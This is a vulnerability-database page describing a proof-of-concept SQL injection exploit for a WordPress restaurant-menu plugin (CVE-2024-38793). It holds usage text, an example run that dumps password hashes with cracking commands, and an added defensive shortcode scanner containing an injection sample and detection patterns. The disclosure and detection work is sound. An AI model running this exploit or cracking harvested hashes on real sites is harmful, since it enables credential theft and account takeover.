
PoC details: c9bc8a77e74b8228bdb2155b01891a8ed1d04aef

Source
Related vulnerability
Title: WordPress plugin Best Restaurant Menu security vulnerability (CVE-2024-38793)
Description: WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform developed in PHP; it lets users host a personal blog on a server running PHP and MySQL. A WordPress plugin is an application extension for that platform. The WordPress plugin Best Restaurant Menu 1.4.1 and earlier contain a security vulnerability caused by improper neutralization of special elements, leading to SQL injection.
Description
Proof of Concept code for exploitation of CVE-2024-38793 (Best Restaurant Menu by PriceListo <= 1.4.1 - Authenticated (Contributor+) SQL Injection)
Introduction
# CVE-2024-38793-PoC
Proof of Concept code for exploitation of CVE-2024-38793 (Best Restaurant Menu by PriceListo <= 1.4.1 - Authenticated (Contributor+) SQL Injection).
## Proof Of Concept
This is a proof of concept exploit for the vulnerability [CVE-2024-38793](https://patchstack.com/database/vulnerability/best-restaurant-menu-by-pricelisto/wordpress-best-restaurant-menu-by-pricelisto-plugin-1-4-1-sql-injection-vulnerability), an SQL injection vulnerability for versions of the WordPress plugin [Best Restaurant Menu a.k.a Great Restaurant Menu WP](https://wordpress.org/plugins/best-restaurant-menu-by-pricelisto/) before 1.4.2.

The vulnerability occurs because of a lack of input sanitization on the `groups` argument when using the `brm_restaurant_menu` shortcode.

**Note**: This does require the credentials of a user with at least Contributor level privileges.

The code will attempt to grab the username and password hashes from the WordPress users table.
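Because the injection point is a shortcode attribute that any Contributor-level user can store in post content, a defender can hunt for abuse after the fact by scanning saved posts. The following script is an added example for this page, not code from the PoC repository or the plugin: it parses `brm_restaurant_menu` shortcodes out of post content and flags any `groups` value that is not a plain comma-separated list of numeric ids (the benign form is an assumption made here) or that carries SQL metacharacters. The sample posts are constructed for the example.

```python
"""Added defensive example (not part of the CVE-2024-38793 PoC repository).

Scans WordPress post content for [brm_restaurant_menu ...] shortcodes whose
`groups` attribute, the unsanitized input named in the advisory, looks like
an injection attempt. Feed it rows exported from wp_posts.post_content to
locate posts planted before the site was updated to 1.4.2.
"""

import re
from typing import Dict, Iterable, List, Tuple

# Matches [brm_restaurant_menu ...] and captures the raw attribute text.
SHORTCODE_RE = re.compile(r"\[brm_restaurant_menu\b([^\]]*)\]", re.IGNORECASE)
# Matches key="value", key='value' or key=value pairs inside a shortcode.
ATTR_RE = re.compile(r'(\w+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|(\S+))')
# Characters and keywords that have no place in a list of group ids.
SQLI_RE = re.compile(
    r"(['\"`;]|--|/\*|\b(union|select|sleep|benchmark|or|and)\b)", re.IGNORECASE
)
# Assumed benign form of `groups`: comma-separated integers (assumption).
BENIGN_RE = re.compile(r"^\s*\d+(\s*,\s*\d+)*\s*$")


def parse_attrs(attr_text: str) -> Dict[str, str]:
    """Turn the attribute text of one shortcode into a {name: value} dict."""
    attrs: Dict[str, str] = {}
    for m in ATTR_RE.finditer(attr_text):
        key = m.group(1).lower()
        # Exactly one of the three value groups matched; take it.
        value = next(v for v in m.groups()[1:] if v is not None)
        attrs[key] = value
    return attrs


def scan_post(post_id: int, content: str) -> List[Dict[str, object]]:
    """Return one finding per suspicious brm_restaurant_menu shortcode in a post."""
    findings: List[Dict[str, object]] = []
    for m in SHORTCODE_RE.finditer(content):
        groups = parse_attrs(m.group(1)).get("groups")
        if groups is None or BENIGN_RE.match(groups):
            continue  # no groups attribute, or a plain id list: nothing to report
        reason = "non-numeric groups value"
        if SQLI_RE.search(groups):
            reason = "SQL metacharacters in groups value"
        findings.append({"post_id": post_id, "groups": groups, "reason": reason})
    return findings


def scan_posts(posts: Iterable[Tuple[int, str]]) -> List[Dict[str, object]]:
    """Scan (post_id, post_content) rows and collect all findings."""
    findings: List[Dict[str, object]] = []
    for post_id, content in posts:
        findings.extend(scan_post(post_id, content))
    return findings


# Constructed sample rows, not taken from any real site.
SAMPLE_POSTS = [
    (101, 'Lunch menu: [brm_restaurant_menu groups="3,7"]'),
    (219, "Specials [brm_restaurant_menu groups=\"1' OR '1'='1\"]"),
    (220, "Plain post with no shortcode at all."),
]

if __name__ == "__main__":
    for f in scan_posts(SAMPLE_POSTS):
        print(f"post {f['post_id']}: {f['reason']}: {f['groups']!r}")
```

Run it against an export of `wp_posts` (post id and content) and review every flagged post together with its author and revision history; a hit on a post created by a Contributor account is the kind of artifact the exploit above leaves behind.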

## Usage
```
CVE-2024-38793 Exploit (Best Restaurant Menu by PriceListo Version <= 1.4.1) PoC
         Requires Contributor+ Privileges on a WordPress instance with the plugin installed
         Credit: @ret2desync
         Will attempt to create a new post, exploit the vulnerability and extract all users usernames and password hashes
         Example usage:
         python3 CVE-2024-38793.py -t "http://127.0.0.1/wordpress/" -u contributor -p password --proxy "http://127.0.0.1:8080"
usage: CVE-2024-38793.py [-h] -t TARGET -u USERNAME -p PASSWORD [--proxy PROXY] [-o OUTFILE]

```
## Example run
```
python3 CVE-2024-38793.py -t "http://127.0.0.1/wordpress/" -u contributor -p password      
CVE-2024-38793 Exploit (Best Restaurant Menu by PriceListo Version <= 1.4.1) PoC
         Requires Contributor+ Privileges on a WordPress instance with the plugin installed
         Credit: @ret2desync
         Will attempt to create a new post, exploit the vulnerability and extract all users usernames and password hashes
         Example usage:
         python3 CVE-2024-38793.py -t "http://127.0.0.1/wordpress/" -u contributor -p password --proxy "http://127.0.0.1:8080"
[*] Successfully signed in to Wordpress using contributor password
[*] Successfully created new post, id: 219
[*] Successfully saved new post with exploit, post id: 219
[*] Successfully grabbed usernames and password hashes
[*] Found 2 sets of credentials
[***                Credentials                ***]
root:$P$BG.b.gHI.byee9PWs8GspKxY9qp0Cm0
contributor:$P$BBVRINbQUo28Tpbp3H7/iITT/Eo9aR0
[*] Crack hashes with: 
 john <hashes_file> --wordlist=<wordlist> 
 hashcat -m 400 -a 0 --username <hashes_file> <wordlist>
[*] Exploit completed successfully
```
File snapshot

```
[4.0K] /data/pocs/c9bc8a77e74b8228bdb2155b01891a8ed1d04aef
├── [7.1K] CVE-2024-38793.py
├── [1.0K] LICENSE
└── [2.6K] README.md

0 directories, 3 files
```